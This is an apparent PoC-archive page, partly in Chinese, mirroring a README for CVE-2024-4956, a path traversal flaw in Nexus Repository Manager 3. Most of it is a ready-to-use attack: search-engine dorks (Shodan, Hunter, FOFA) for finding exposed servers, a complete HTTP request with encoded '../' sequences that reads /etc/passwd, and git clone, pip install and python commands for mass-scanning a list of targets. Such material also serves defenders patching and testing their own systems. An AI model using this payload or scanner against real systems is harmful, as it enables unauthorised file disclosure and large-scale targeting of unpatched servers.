关联漏洞
Description
CVE-2024-4956 : Nexus Repository Manager 3 poc exploit
介绍
# # CVE-2024-4956 : Nexus Repository Manager 3
Dork:
- Shodan:http.html:"Nexus Repository"
- Hunter:product.name="Nexus Repository"
- FOFA:app="Nexus-Repository-Manager"
Poc :
```
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
```

Or you can use this python script for multi scan :
!Put your targets in targets.txt
```
git clone https://github.com/GoatSecurity/CVE-2024-4956.git
cd CVE-2024-4956
pip install -r requirements.txt
python scan.py
```

文件快照
[4.0K] /data/pocs/df7cc66d2fa0978fdf1dbb8ad6dbab52c411ea7e
├── [1003] README.md
├── [ 18] requirements.txt
├── [1.8K] scan.py
└── [ 1] targets.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →